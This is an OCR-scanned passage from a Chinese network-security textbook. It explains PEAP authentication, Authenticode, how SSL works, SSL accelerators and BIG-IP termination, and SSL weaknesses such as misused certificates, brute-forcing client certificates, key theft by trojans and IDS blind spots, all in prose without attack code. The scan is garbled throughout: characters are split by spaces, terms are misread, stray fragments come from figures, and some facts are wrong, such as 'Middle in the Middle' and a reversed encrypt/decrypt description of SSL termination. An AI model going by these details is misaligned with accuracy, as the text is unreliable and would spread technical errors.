EAP-MS-CHAPv2 是 基于 密码 的 用 户 身份 验证 方法 ,使 用 带 有 服务 器 证 书 的 TLS。 在 
PEAP-EAP-MS-CHAPv2 身份 验证 过 程 中 .IAS 或 RADIUS 服务 器 提供 证 书 , 以 便 向 客户 
端 验证 其 身份 (如 果 Windows XP Professional 客户 端 上 配置 了 “验证 服务 器 证 书 ” 选 项 )。 
客户 端 计算 机 和 用 户 身份 使 用 密码 完成 验证 ,从 而 克服 了 向 无 线 客户 端 计算 机 部 署 证 书 的 
一 些 困 难 。 

802.1X 无 线 和 切换 客户 端 还 可 以 使 用 PEAP-EAP-TLS, 它 提供 很 高 的 安全 性 。 
PEAP-EAP-TLS 使 用 的 PKI 包含 用 于 服务 器 身份 验证 的 证 书 和 用 于 客户 端 计算 机 和 用 户 
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身份 验证 的 智能 卡 或 证 书 。 
314 Authenticode 技术 


Microsoft 用 于 代码 签名 的 技术 称 为 Authenticode。Authenticode 是 客户 端 软 件 , 它 监 
视 ActiveX 控件 、. cab 文件 .Java 小 程序 或 可 执行 文件 的 下 载 ,然后 向 用 户 显示 有 关 可 能 的 
安全 问题 警告 。 除 了 显示 这 些 警告 ,Authenticode 还 显示 证 书信 息 ,例如 数字 签名 中 包括 的 
名 称 . 它 是 商业 证 书 还 是 个 人 证 书证 书 过 期 日 期 。 以 便 用 户 可 以 在 继续 下 载 之 前 做 出 更 明 
智 的 决定 。 

Authenticode 通过 在 下 载 的 文件 中 查找 数字 证 书 ( 是 否 缺乏 ) 来 进行 工作 。 数 字 证 书 在 
进行 编译 时 合并 到 . cab 或 . ocx 文件 中 。 证 书 的 一 部 分 是 数字 签名 一 一 独立 软件 供应 商 
(CISV) 的 名 称 。 包 含 数字 签名 的 文件 称 为 已 签名 。 

如 果 软 件 的 一 部 分 已 经 过 数字 签名 , 则 IE 可 以 验证 此 软件 是 否 来 自命 名 软件 的 发 布 者 
且 未 被 算 改 。 如 果 此 软件 通过 测试 , 则 IE 浏览 器 显示 一 个 验证 证 书 。 

当 数字 签名 无 法 通过 验证 过 程 时 ,IE 浏览 器 报告 签名 无 效 的 原因 ,询问 用 户 是 否 选择 
继续 下 载 。 

根据 数字 签名 的 状态 ,可 以 配置 IE 浏览 器 以 进行 不 同 的 操作 。 签 名 的 状态 可 以 是 未 签 
名 的 ,使 用 有 效 证 书 来 签名 的 ,或 使 用 无 效 证 书 来 签名 的 。 

无 论 是 已 签名 或 未 签名 的 软件 ,可 以 通过 配置 IE 浏览 器 来 阻止 从 某 一 区 域 下 载 或 运行 
软件 。 

但 有 效 数字 签名 并 不 意味 着 软件 没有 问题 。 它 只 是 表示 软件 来 自用 户 可 以 选择 信任 的 
可 跟踪 来 源 , 而 且 软 件 自从 发 布 后 未 被 算 改 。 同 样 ,无 效 签名 并 不 能 说 明 软 件 有 问题 或 危 
险 ,而 只 是 警告 用 户 存在 潜在 的 危险 和 问题 。 


3.2 SSL 的 工作 原理 


SSL(Secure Socket Layer) 是 Netscape 公司 设计 的 主要 用 于 Web 的 安全 传输 协议 。 
这 种 协议 在 Web 上 获得 了 广泛 的 应 用 。IETF (www. ietf. org) 将 SSL 做 了 标准 化 , 即 
RFC2246 ,并 将 其 称 为 TLS(Transport Layer Security) ,从 技术 上 讲 ,TLS 1. 0 与 SSL 3.0 
的 差别 非常 小 。 

SSL 是 一 个 介 于 HTTP 协议 与 TCP 之 间 的 一 个 可 选 层 ,其 位 


置 大 致 如 图 3. 1 所 示 。 ee 
SSL 在 TCP 之 上 建立 了 一 个 加 密 通道 ,通过 这 一 层 的 数据 经 过 es 

了 加 密 ,因此 达到 保密 的 效果 。 a 
SSL 协议 分 为 两 部 分 : Handshake Protocol 和 Record Protocol。 h 


其 中 Handshake Protocol 用 来 协商 密 钥 ,协议 的 大 部 分 内 容 就 是 通 ” 图 3.1 SSL 的 位 置 
信和 双方 如 何 利用 它 来 安全 的 协商 出 一 份 密 钥 。Record Protocol 则 

定义 了 传输 的 格式 。SSL 的 结构 是 严 并 的 ,问题 一 般 出 现在 不 严谨 的 实际 应 用 中 。 常 见 的 攻 
击 就 是 Middle in the Middle 攻击 , 它 是 指 在 A 和 B 通信 的 同时 ,有 第 三 方 C 处 于 信道 的 中 间 ， 
可 以 完全 听 到 A 与 B 通 信 的 消息 ,并 可 拦截 ,替换 和 添加 这 些 消息 。SSL 一 般 具 有 以 下 特点 : 
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Q@ SSL 可 以 允许 多 种 密 钥 交 换算 法 ,而 有 些 算法 ,如 DH 则 没有 证 书 的 概念 ,这 样 A 便 
无 法 验证 B 的 公 钥 和 身份 的 真实 性 ,从 而 C 可 以 轻易 地 冒充 (A 或 B) ,用 自己 的 密 钥 与 双方 
通信 ,从 而 窃听 到 别人 谈话 的 内 容 。 而 为 了 防止 middle in the middle 攻击 ,应 该 采用 有 证 
书 的 密 钥 交换 算法 。 

@ 有 了 证 书 以 后 ,如 果 C 用 自己 的 证 书 蔡 换 掉 原 有 的 证 书 之 后 ,A 的 浏览 器 会 弹出 一 
个 提示 框 进行 警告 。 

@ 由 于 美国 密码 出 口 的 限制 ,IE、Netscape 等 浏览 器 所 支持 的 加 密 强 度 是 很 弱 的 ,如 果 
只 采用 浏览 器 自 带 的 加 密 功 能 的 话 ,存在 被 破解 的 可 能 。 

SSL 使 用 复杂 的 数学 公式 进行 数据 加 密 和 解密 ,这 些 公式 的 复杂 性 根据 密码 的 算法 强 
度 不 同 而 不 同 。 高 强度 的 计算 会 使 多 数 服务 器 停顿 ,导致 性 能 下 降 。 多 数 Web 服务 器 在 执 
行 SSL 相关 任务 时 ,吞吐 量 会 显著 减少 ,速度 比 在 只 执行 HTTP 1. 0 连接 时 慢 50 多 倍 。 而 
且 由 于 SSL 复杂 的 认证 方案 和 加 /解密 算法 ,SSL 消耗 大 量 地 CPU 资源 ,从 而 造成 Web 服 
务 器 性 能 很 大 程度 的 下 降 ,导致 在 线 客户 流失 。 

为 解决 这 种 性 能 上 的 损失 ,用 户 可 以 通过 安装 SSL 加 速 器 和 务 载 器 来 减少 SSL 交易 中 
的 时 延 。 加 速 器 通过 执行 一 部 分 SSL 处 理 任 务 来 提高 交易 速度 ,同时 依靠 安全 Web 服务 
器 软件 完成 其 余 的 任务 。 外 载 器 承担 所 有 SSL 处 理 任务 并 且 不 需要 安全 Web 服务 器 软 
件 , 从 而 使 Web 服务 器 可 以 以 同样 的 高 速度 提供 安全 和 非 安全 的 服务 。 由 于 密 钥 管理 和 维 
护 过 程 不 依靠 对 应 用 软件 的 手工 配置 ,因此 使 用 务 载 器 效率 会 更 高 一 些 。 多 数 这 类 设备 作 
为 网 络 应 用 被 安装 在 机 架 式 或 小 底座 网 络 设 备 上 ,由 于 它们 为 整个 网 络 提供 加 解密 服务 , 因 
此 设备 与 Web 服务 器 之 间 的 数据 是 未 加 密 的 。 加 密 的 数据 由 客户 端 经 过 Internet 传输 到 
一 台 服 务 器 上 。 安 装 在 这 台 服 务 器 上 的 印 载 器 对 数据 进行 解密 并 将 其 沿 PCI 总 线 直 接 传 
输 到 处 理 器 。 这 样 做 的 结果 是 宿主 服务 器 在 保证 客户 机 与 服务 器 之 间 传 输 数据 安全 性 的 同 
时 ,以 非 安 全 交易 服务 速度 提供 了 安全 交易 服务 。 

将 SSL 设备 集成 到 网 络 中 很 简单 ,第 四 层 到 第 七 层 交 换 机 或 负载 均衡 设备 被 配置 为 将 
所 有 的 443 端口 (HTTPS) 请 求 改 向 传输 到 SSL 设备 。 随 着 安全 传输 流 容 量 的 增加 ,在 不 
增加 管理 负担 的 条 件 下 ,可 以 再 部 署 其 他 SSL 设备 。 

SSL 加 速 器 功能 已 经 被 集成 到 像 服 务 器 端 缓 存 ( 即 所 谓 的 “服务 器 加 速 器 "7 这 类 Web 
产品 中 。 这 种 作法 的 主要 好 处 是 ,服务 器 加 速 器 进行 SSL 处 理 和 对 象 提交 。 


3.3 SSL 基本 结构 的 集中 管理 


在 企业 环境 中 ,采用 SSL 协议 的 Web 服务 器 的 需求 正在 逐步 增加 ,需要 更 加 强大 和 有 
效 的 SSL 基本 结构 。 本 小 节 曾 述 利 用 SSL 基本 结构 的 集中 管理 来 减少 结构 的 复杂 性 和 整 
体 成 本 。 


33.1 SSL 的 实施 


一 种 SSL 的 实施 是 基于 软件 的 解决 方案 。 在 这 种 实施 中 ,服务 器 通过 SSL 与 客户 端 连 
接 然后 在 软件 级 别 上 执行 加 密 和 解密 。SSL 握手 实际 上 是 客户 端 和 服务 器 端 协商 使 用 哪 
种 运算 法 则 和 密 钥 ,是 处 理 器 的 一 种 操作 。 因 为 执行 握手 过 程 和 运行 应 用 程序 需要 消耗 大 
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量 的 资源 ,所 以 连接 到 这 台 服 务 器 上 的 客户 端的 数量 受到 限制 。 如 果 想 连接 更 多 的 客户 端 
需要 更 多 的 性 能 更 优 的 服务 器 。 

另 一 种 SSL 的 实施 是 通过 添加 额外 独立 的 SSL 加 速 卡 实现 的 ,例如 Roadcom Crypto 
NetXM 卡 。SSL 通信 量 并 不 会 对 整个 网 络 流量 带 来 影响 ,但 是 它 加 重 了 处 理 网 络 流量 的 服 
务 器 的 负担 。 使 用 加 密 方式 通信 的 Web 站 点 和 Web 应 用 程序 可 能 会 因为 Web 站 点 流量 
的 增加 而 出 现 响应 时 间 的 延迟 。 为 每 个 Web 服务 器 增加 SSL 加 速 卡 可 以 避免 Web 站 点 和 
Web 应 用 程序 出 现 这 种 延迟 。 当 SSL 协商 过 程 被 SSL 加 速 卡 来 进行 处 理 后 可 以 将 服务 器 
的 处 理 器 解脱 出 来 用 于 处 理 其 他 的 内 容 和 应 用 程序 。 

为 了 管理 更 高 级 别 的 流量 ,管理 员 能 够 将 多 个 Web 服务 器 组 织 成 一 个 Web 服务 器 组 ， 
如 图 3. 2 所 示 。 这 个 组 中 的 每 个 Web 服务 器 必须 安装 有 内 置 的 加 速 卡 以 便 能 够 提供 SSL 
握手 处 理 。 这 种 SSL 基本 结构 比 基 于 软件 方式 的 SSL 或 使 用 加 速 卡 的 单个 Web 服务 器 的 
性 能 要 好 得 多 ,但 是 它 也 有 局 限 性 。 


三 HTTP 数 据 


HTTP 数 据 回 


客户 端 1 客户 端 2 


3.2 Web 服务 器 组 示意 图 


332 Web 服务 器 组 的 局 限 性 


因为 许多 服务 器 使 用 不 同 的 加 密 技术 来 加 密 数据 ,因此 管理 这 样 一 个 Web 服务 器 组 会 
比较 复杂 ,并 且 花 费 比较 大 。 在 一 个 传统 的 采用 负载 均衡 的 Web 服务 器 阵列 中 ,每 个 处 理 
加 密 数据 的 服务 器 要 求 都 有 一 个 SSL 加 速 卡 和 一 个 数字 证 书 。 数 字 证 书 是 被 CA 签署 的 
一 个 电子 认证 标志 。 在 加 密 通 信和 方面 提供 了 身份 一 致 性 的 验证 。 

为 了 从 CA 获得 一 个 数字 证 书 ,管理 员 必 须 创 建 一 个 公 钥 对 和 CSR ,然后 提交 这 些 项 目 
给 CA。 这 个 过 程 被 Web 服务 器 组 中 的 各 个 服务 器 重复 进行 。 数 字 证 书 仅仅 是 在 有 限 的 时 
间 内 是 有 效 的 , 当 证 书 过 期 后 管理 员 还 必须 重新 申请 获得 证 书 。 

管理 这 些 支 持 SSL 特性 的 服务 器 是 耗 时 的 ,而 且 成 本 很 高 。 技 术 的 进步 可 以 降低 SSL 
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加 速 卡 的 成 本 ,但 是 仍然 很 昂贵 。 并 且 每 次 认证 到 期 后 ,都 必须 从 CA 重新 购买 。 这 种 花费 
成 本 极 大 的 增加 了 采购 与 管理 支持 SSL 特性 服务 器 的 成 本 。 


333 将 SSL 和 BIG-IP 进行 整合 


一 种 集中 且 简 单 的 管理 SSL Web 服务 器 组 的 方式 是 通过 Dell Power Edge Load 
Balancing Server-BIG-IP Powered 实现 负载 均衡 ,一 般 称 之 为 BIG-IP。BIG-IP 是 一 个 运行 
有 BIG-IP 负载 均衡 软件 的 Dell Power Edge 服务 器 。 它 通过 SSL 加 速 卡 实现 SSL 的 Off- 
Loading 同时 还 可 以 实现 应 用 层 和 IP 层 的 负载 均衡 。 一 般 作 为 元 余 性 ,这 个 工具 还 提供 了 
对 关键 Web 结构 的 高 可 用 性 保证 。 

通过 允许 SSL 的 终结 ,BIG-IP 工具 可 以 减少 Web 服务 器 组 的 管理 复杂 性 和 成 本 。 使 
用 SSL 的 终结 ,前 端的 BIG-IP 加 密 从 客户 端 接收 的 数据 然后 将 它们 发 送 到 后 端 服务 器 。 
后 端 服务 器 响应 这 个 请 求 后 将 完成 的 请 求 发 送 给 BIG-IP,BIG-IP 再 重新 解密 数据 然后 发 送 
给 客户 端 。 因 为 后 台 服 务 器 并 不 是 直接 参与 SSL 的 处 理 ,它们 不 要 求 SSL 硬件 或 数字 证 
书 。BIG-IP 在 只 有 考虑 宛 余 性 时 才 要 求 SSL 硬件 和 数字 证 书 。 在 可 测量 性 方面 ,BIG-IP 
工具 每 秒 钟 最 多 能 够 管理 到 800 个 加 密 处 理事 务 。 


1. 在 Web 服务 器 环境 中 实现 BIG-IP 


大 多 数 的 BIG-IP 把 前 端 配置 成 一 个 应 用 服务 器 阵列 。 这 些 服 务 器 可 能 组 成 了 一 个 数 
据 库 ,cache 池 、 防 火 墙 、 邮 件 交换 组 、 虚 拟 专用 网 络 或 Web 服务 器 组 。 前 端的 Web 服务 器 
组 包括 了 两 类 服务 器 ,一 类 满足 SSL 的 处 理 , 另 一 类 进行 内 容 的 解密 。BIG-IP 实现 的 例子 


如 图 3. 3 所 示 。 
加 HTTP 数 据 Internet HTTP 数 据 
Ce ul 


客户 端 1 客户 端 2 
防火 墙 
HTTPS/HTTP 数 据 
SSL 加 速 器 和 数字 认证 Fy 
4 
HTTP 数 据 


Web 仓 库 


Web 服 务 器 
图 3.3 使 用 BIG-IP 实现 SSL 的 集中 管理 
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2. 完成 SSL 配置 


为 了 配置 SSL 终结 ,管理 员 必 须 获 得 由 CA 认证 的 证 书 并 架设 一 个 SSL 代理 。 管 理 员 
使 用 配置 工具 产生 一 个 CSR 并 将 它 提交 给 CA。 当 接收 到 一 个 正确 的 证 书后 ,管理 员 将 它 
安装 到 一 个 BIG-IP 上 。 

当 在 BIG-IP 对 上 安装 完 证 书后 ,管理 员 改 变 VS1 的 地 址 (就 是 驻 留 在 前 端的 SECURE 池 
中 的 ) 为 127. 0.0.1。 然 后 创建 一 个 SSL 代理 并 给 它 分 配 一 个 IP 地 址 为 192. 168. 1. 100, 它 
的 目标 虚拟 服务 器 是 VS1。 客 户 端 也 能 够 通过 https://192. 168. 1. 100 访问 这 个 安全 站 
点 。 当 加 密 数据 到 达 IP 地 址 为 192. 168. 1. 100 的 SSL 代理 后 ,首先 解密 ,然后 发 送 到 
VS1, 并 最 终 转 到 安全 缓冲 池 。 

配置 的 最 后 步骤 是 提供 这 个 Web 服务 器 组 的 持续 运行 。 因 为 BIG-IP 解密 所 有 的 数 
据 , 更 多 的 持续 性 选项 变 得 可 用 。BIG-IP 能 够 持续 的 检测 信息 的 HTTP 报头 ,例如 SSL 任 
务 IDs 或 HTTP Cookies。 更 新 的 Microsoft IE 浏览 器 包括 了 一 个 安全 功能 ,能 够 重新 判 
断 Web 服务 器 上 的 SSL 任务 。 

新 版 本 的 Microsoft Internet Explorer 浏览 器 包含 安全 特性 可 以 与 Web 服务 器 的 SSL 
会 话 ID 完成 重新 数据 协商 操作 。 该 特性 根据 会 话 ID 持续 运行 ,因此 不 适合 应 用 于 电子 商 
务 Web 站 点 ,但 是 非常 适用 于 负载 均衡 其 他 加 密 应 用 程序 。 

BIG-IP 工具 提供 了 四 种 基于 HTTP Cookie 的 Persistence: 插入 模式 、 重 写 模式 、 被 动 
模式 和 细 分 模式 。 在 插入 模式 中 ,BIG-IP 创建 和 写 Cookie 到 服务 器 响应 的 HTTP 报头 
中 。 在 重 写 模式 中 ,服务 器 创建 Cookie 会 被 BIG-IP 覆盖 。 在 被 动 模式 中 ,后 台 服 务 器 
创建 Cookie, 这 包括 了 足够 的 供 BIG-IP 负载 均衡 流量 的 使 用 的 信息 。 在 细 分 模式 中 ， 
BIG-IP 创建 一 个 Cookie 的 细 分 以 便 返回 的 信息 能 够 被 传输 到 负载 均衡 组 中 正确 的 服 
务 器 中 。 

为 了 避免 对 后 台 服 务 器 的 任何 重新 配置 ,管理 员 选 择 插 入 模式 Cookie。 当 一 个 客户 返 
回 到 一 个 Web 站 点 时 ,他 通过 Cookie 就 已 经 驻 留 在 BIG-IP 中 了 。 该 站 点 的 信息 就 已 经 存 
储 在 Cookie 中 , 当 客 户 下 次 再 访问 这 个 站 点 时 会 很 快 的 显示 出 来 。 管 理 员 通过 Persistence 
功能 可 以 提供 一 个 完整 的 电子 商务 站 点 。 

BIG-IP 工具 提供 了 几 个 SSL 实施 之 外 的 功能 。 它 能 负载 均衡 各 种 不 同类 型 的 应 用 程 
序 , 或 后 台数 据 库 。 在 一 个 单一 的 Web 服务 器 组 中 ,一 个 BIG-IP 也 能 检测 进入 通信 的 
HTTP 报头 然后 将 它们 直接 发 送 给 不 同类 型 的 服务 器 。 

Dell Power Edge Load Balancing Server-BIG-IP Powered 提供 了 一 种 性 价 比 很 高 的 方 
法 来 管理 当前 复杂 的 Web 服务 器 结构 中 的 Web 站 点 的 加 密 性 。 通 过 结合 SSL 证 书 管理 ， 
BIG-IP 帮助 用 户 减 少 了 复杂 性 和 整体 拥有 成 本 。 


3.4 用 SSL 安全 协议 实现 Web 服务 器 的 安全 性 


目前 SSL 安全 协议 已 经 得 到 了 广泛 的 应 用 ,本 节 将 详细 介绍 SSL 安全 协议 在 保护 
Web 服务 器 安全 方面 的 应 用 。 
为 提供 具有 真正 安全 连接 的 高 速 安全 套 接 层 (SSL) 交 易 , 可 以 将 PCI 卡 形式 的 SSL 印 
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载 (Off Loading) 设 备 直接 安装 到 Web 服务 器 上 ,这 种 做 法 的 好 处 有 以 下 几 点 。 

O@ 从 客户 机 到 安全 Web 服务 器 的 数据 安全 性 高 。 

@ 由 于 种 载 工 具 执 行 所 有 SSL 处 理 过 程 并 完成 TCP/IP 协商 ,因此 大 大 提高 了 吞 
吐 量 。 

@ 简化 密 钥 的 管理 和 维护 。 

向 电子 商务 和 其 他 安全 Web 站 点 的 服务 器 增加 SSL 加 速 和 名 载 设备 可 以 提高 交易 处 
理 速 度 。 但 是 由 于 SSL 设备 是 作为 应 用 被 安装 在 网 络 上 的 ,因此 SSL 设备 与 安全 服务 器 之 
间 的 数据 是 未 加 密 的 。 将 SSL 缉 载 设备 作为 PCI 扩展 卡 直 接 安装 在 安全 服务 器 上 ,保证 了 
从 浏览 器 到 服务 器 的 连接 安全 性 。 

SSL 可 以 用 于 在 线 交易 时 保护 信用 卡 账 号 以 及 股票 交易 明细 这 类 敏感 信息 。 受 SSL 
保护 的 网 页 具有 https 前 组 ,而 非 标准 的 http 前 级 。 

新 型 专用 网 络 设备 SSL 加 速 器 可 以 使 Web 站 点 通过 在 优化 的 硬件 和 软件 中 进行 所 有 
的 SSL 处 理 来 满足 性 能 和 安全 性 的 需要 。 

当 具 有 SSL 功能 的 浏览 器 (Navigator、IE) 与 Web 服务 器 (Apache IIS) 通 信 时 ,它们 利 
用 数字 证 书 确认 对 方 的 身份 。 数 字 证 书 是 由 可 信赖 的 第 三 方 发 放 的 ,并 被 用 于 生成 公共 
密 钥 。 

当 最 初 的 认证 完成 后 ,浏览 器 向 服务 器 发 送 48 字 节 利用 服务 器 公共 密 钥 加 密 的 主 密 
钥 , 然 后 Web 服务 器 利用 自己 的 私有 密 钥 解 密 这 个 主 密 钥 ,浏览 器 和 服务 器 在 会 话 过 程 中 
用 来 加 解密 的 对 称 密 钥 集合 就 生成 了 。 加 密 算法 可 以 为 每 次 会 话 显 式 地 配置 或 协商 ,使 用 
最 广泛 的 加 密 标准 为 “数据 加 密 标准 (DES) 和 RC4”。 

一 旦 完成 上 述 启动 过 程 ,安全 通道 就 建立 了 ,保密 的 数据 传输 就 可 以 开始 。 需 要 注意 的 
是 由 于 必须 为 每 次 用 户 会 话 执行 启动 过 程 ,因而 给 服务 器 CPU 造成 了 沉重 负担 并 产生 了 
严重 的 性 能 瓶颈 。 据 测试 , 当 处 理 安全 的 SSL 会 话 时 ,标准 的 Web 服务 器 只 能 处 理 1% 到 
10% 的 正常 负载 。 


3.5 SSL 的 安全 漏洞 及 解决 方案 


如 果 用 户 在 互联 网 上 访问 某 些 网 站 时 在 浏览 器 窗口 的 下 方 有 一 个 锁 的 小 图 标 男 | ,就 
表示 该 网 页 受到 SSL 保护 。 但 用 SSL 防护 的 网 站 真 的 能 够 防范 黑客 吗 ? 现在 国内 有 很 多 
人 对 SSL 存在 这 么 一 个 认识 误区 : SSL 很 安全 ,受到 SSL 防护 的 ,网 页 服务 器 上 的 资料 就 
一 定 是 万 无 一 失 的 。 这 也 导致 这 样 一 个 局 面 , 只 要 有 着 SSL 防护 的 网 站 服务 器 很 少 接受 审 
查 以 及 监测 。 下 面 将 简单 介绍 一 下 SSL 存在 的 安全 漏洞 及 解决 方案 。 

目前 几乎 所 有 处 理 具 有 敏感 度 的 资料 .财务 资料 或 者 要 求 身份 认证 的 网 站 都 会 使 用 
SSL 加 密 技 术 ( 当 用 户 看 到 https 在 用 户 的 网 页 浏览 器 上 的 URL 出 现时 ,用 户 就 是 正在 使 
用 具有 SSL 保护 的 网 页 服务 器 。)。 在 这 里 把 SSL 比喻 成 是 一 种 在 浏览 器 跟 网 络 服务 器 之 
间 “ 受 密码 保护 的 导管 "(Crypto Graphic Pipe) ,也 就 是 常 说 的 安全 通道 。 这 个 安全 通道 把 
使 用 者 以 及 网 站 之 间 往 返 的 资料 加 密 起 来 。 但 是 SSL 并 不 会 消除 或 者 减弱 网 站 所 将 受到 
的 威胁 性 。 
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35.1 SSL 易 受到 的 攻击 


虽然 一 个 网 站 可 能 使 用 了 SSL 安全 技术 ,但 这 并 不 是 说 在 该 网 站 中 正在 输入 和 以 后 输 
入 的 数据 也 是 安全 的 。 所 有 人 都 应 该 意识 到 SSL 提供 的 仅仅 是 电子 商务 整体 安全 解决 方 
案 中 的 一 小 部 分 。 使 用 了 SSL 的 网 站 可 能 受到 的 攻击 和 其 他 服务 器 并 无 任何 区 别 , 同 样 应 
该 留意 各 方面 的 安全 隐患 。SSL 常见 安全 问题 有 下 面 三 种 。 


1. 攻击 证 书 


类 似 Verisign 之 类 的 公共 CA 机 构 并 不 总 是 可 靠 的 。 例 如 ,如 果 Verisign 发 放 一 个 证 
书 说 我 是 “ 某 某 某 ”, 系 统管 理 员 很 可 能 就 会 相信 “我 是 某 某 某 ”。 但 是 ,对 于 用 户 的 证 书 , 公 
共 CA 机 构 可 能 不 像 对 网 站 数字 证 书 那 样 重视 和 关心 其 准确 性 。 例 如 , Verisign 发 放 了 一 
个 “Keyman” 组 织 的 证 书 , 该 组 织 的 成 员 JACK 在 某 网 站 要 求 认证 用 户 身份 时 , 提交 了 
“JACK 的 证 书 。 用 户 可 能 会 对 其 返回 的 结果 大 吃 一 惊 的 。 更 为 严重 的 是 ,由 于 Microsoft 
公司 的 IIS 服务 器 提供 了 “客户 端 证 书 映射 "(Client Certificate Mapping) 功 能 ,用 于 将 客户 
端 提交 证 书 中 的 名 字 映 射 到 NT 系统 的 用 户 账 号 ,在 这 种 情况 下 JACK 就 能 够 获得 该 主机 
的 系统 管理 员 特 权 ! 

如 果 黑 客 不 能 利用 上 面 的 非法 的 证 书 突破 服务 器 ,他 们 可 以 尝试 暴力 攻击 (Brute- 
Force-Attack) 。 虽 然 暴 力 攻 击 证 书 比 暴 力 攻 击 口令 更 为 困难 。 要 暴力 攻击 客户 端 认 证 , 黑 
客 编辑 一 个 可 能 的 用 户 名 字 列 表 , 然 后 为 每 一 个 名 字 向 CA 机 构 申 请 证 书 。 每 一 个 证 书 都 
用 于 尝试 获取 访问 权限 。 用 户 名 的 选择 越 好 ,其 中 一 个 证 书 被 认可 的 可 能 性 就 越 高 。 暴 力 
攻击 证 书 的 方便 之 处 在 于 它 仅 需要 猜测 一 个 有 效 的 用 户 名 ,而 不 同时 是 猜测 用 户 名 和 口令 。 


2. 窃取 证 书 


除 上 面 的 方法 外 ,黑客 还 可 能 窃取 有 效 的 证 书 及 相应 的 私有 密 钥 。 最 简单 的 方法 是 利 
用 特洛伊 木马 。 这 种 攻击 几乎 可 以 使 客户 端 证 书 形同虚设 。 它 攻击 的 是 证 书 的 一 个 根本 性 
弱点 : 私有 密 钥 ( 整 个 安全 系统 的 核心 ) 经 常 保存 在 不 安全 的 地 方 。 对 付 这 些 攻 击 的 唯一 有 
效 方法 是 将 证 书 保存 到 智能 卡 或 令 牌 之 类 的 设备 中 。 


3. 安全 盲点 


系统 管理 员 没 办 法 使 用 现 有 的 安全 漏洞 扫描 (vulnerability scanners) 或 网 络 入 侵 侦 测 
系统 (Intrusion Detection Systems,IDS) ,来 审查 或 监控 网 络 上 的 SSL 交易 。 网 络 入 侵 侦 测 
系统 是 通过 监测 网 络 传输 来 找寻 没有 经 过 认证 的 活动 。 任 何 符合 已 知 的 攻击 模式 或 者 并 未 
经 过 政策 上 授权 的 网 络 活动 都 被 标志 起 来 以 供 系 统管 理 员 检查 。 而 要 让 IDS 能 够 发 生 作 
用 ,IDS 必须 能 够 检视 所 有 的 网 络 流量 信息 ,但 是 SSL 的 加 密 技 术 却 使 得 通过 HTTP 传输 
的 信息 无 法 让 IDS 辨认 。 再 者 ,虽然 可 以 用 最 新 的 安全 扫描 软件 审查 一 般 的 网 页 服务 器 来 
寻找 已 知 的 安全 盲点 ,这 种 扫描 软件 并 不 会 检查 经 过 SSL 保护 的 服务 器 。 受 到 SSL 保护 的 
网 页 服务 器 的 确 拥有 与 一 般 服务 器 同样 的 安全 盲点 ,可 是 也 许 是 因为 建立 SSL 连接 所 需 
要 的 时 间 以 及 困难 度 ,安全 漏洞 扫描 软件 并 不 会 审查 受到 SSL 保护 的 网 页 服务 器 。 没 有 
网 络 监测 系统 再 加 上 没有 安全 漏洞 审查 ,使 得 最 重要 的 服务 器 反而 成 为 受到 最 少 防护 的 
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服务 器 。 


352 ”SSL 针对 攻击 的 对 策 


至 于 如 何 保护 证 书 的 安全 ,用 户 可 以 采用 IDS, 它 是 一 种 用 于 监测 攻击 服务 器 企图 的 技 
术 和 方法 。 典 型 的 IDS 监视 网 络 通信 并 将 其 与 保存 在 数据 库 中 的 已 知 攻击 “特征 ?或 方法 
比较 。 如 果 发 现 攻击 ,IDS 可 以 提醒 系统 管理 员 、 截 断 连接 甚至 实施 反攻 击 等 。 问 题 在 于 如 
果 网 络 通信 是 加 密 的 ,IDS 将 无 法 监视 。 这 反而 可 能 会 使 攻击 更 为 轻松 。 假 设 在 一 个 典型 
的 被 防火 墙 和 IDS 防护 的 DMZ 环境 中 ,黑客 能 轻松 地 探测 被 SSL 保护 的 网 站 ,因为 通常 一 
台 单一 的 网 站 服务 器 会 同时 使 用 SSL 和 普通 的 TCP 协议 。 由 于 黑客 攻击 的 是 服务 器 而 不 
是 网 络 连接 ,他 们 可 以 选择 任意 一 种 途径 。 通 过 SSL 途径 ,黑客 知道 SSL 加 密 为 他 们 带 来 
的 好 处 ,这 样 更 容易 避 开 IDS 系统 的 监测 。 在 这 里 主要 介绍 在 存在 安全 育 点 的 情况 下 如 何 
解决 安全 问题 的 方法 。 


1. 通过 Proxy 代理 服务 器 的 SSL 


可 以 在 一 个 SSL Proxy 代理 程序 上 使 用 这 项 资料 审查 技术 。SSL Proxy 是 一 个 在 连接 
端口 80 上 接收 纯 文 字 的 HTTP 通信 请 求 的 软件 , 它 会 将 这 些 请 求 通过 经 由 SSL 加 密 过 的 
连接 , 转 寄 到 目标 网 站 。 在 连接 端口 80 打开 一 个 侦 听 的 Socket, 通 过 上 述 的 Open SSL 指 
令 , 将 所 有 进入 这 个 Proxy 的 数据 传输 出 去 。 

如 果 用 户 要 想 测 试 自己 的 Proxy 连接 ,那么 只 要 以 纯 文 字 的 方式 ,在 执行 SSL Proxy 
的 系统 的 连接 端口 80 建立 联机 。 这 个 Proxy 会 使 用 SSL 来 转 寄 接收 的 请 求 到 目标 网 站 。 


$ telnet 192.168.1.100 GET / HTTP/1.0 


在 这 里 ,服务 器 正在 192. 168. 1. 1 的 地 址 执行 SSL Proxy 机 制 ,而 真正 受到 SSL 保护 
的 地 址 则 是 在 192. 168. 1. 10。 通 过 这 个 SSL Proxy 机 制 ,只 要 将 安全 扫描 软件 指向 Proxy 
的 IP 地 址 ,就 可 以 使 用 它 来 审查 一 个 SSL 服务 器 。 

SSL Proxy 的 观念 已 经 存在 一 段 时 间 。 相 对 而 言 , 使 用 命令 列 模式 操作 Open SSL 软 
件 比较 简单 一 些 。 


2. OpenSSL 


Open SSL 包含 了 一 套 程序 以 及 函 式 库 ,提供 前 端 使 用 者 SSL 功能 ,并 且 人 允许 软件 工程 
师 将 SSL 模块 与 他 们 的 程序 结合 。 在 众多 由 SSL 提供 的 产品 里 面 ,最 能 够 用 来 让 用 户 在 
这 里 讨论 的 是 命令 列 模式 的 (Command-Line) SSL 客户 端 以 及 伺服 端 工具 软件 。Open 
SSL 程序 是 一 个 指令 列 接口 的 程序 , 它 是 用 来 以 手动 的 方式 起 始 SSL 连接 。Open SSL 让 
用 户 重新 导 引 与 其 他 程序 之 间 的 资料 输入 以 及 输出 。 

使 用 普遍 可 得 的 安全 扫描 软件 来 审查 SSL 服务 器 在 研究 技术 文件 时 ,在 Apache 提供 
给 Open SSL 的 接口 模块 mod_ssl( 相 关 资 料 网 址 : http://www. modssl. org/) 读 到 了 一 些 
有 趣 的 信息 。 其 中 有 一 段 常见 问题 (FAQ) 讨 论 到 有 关 测 试 在 SSL 保护 下 的 网 站 服务 器 。 
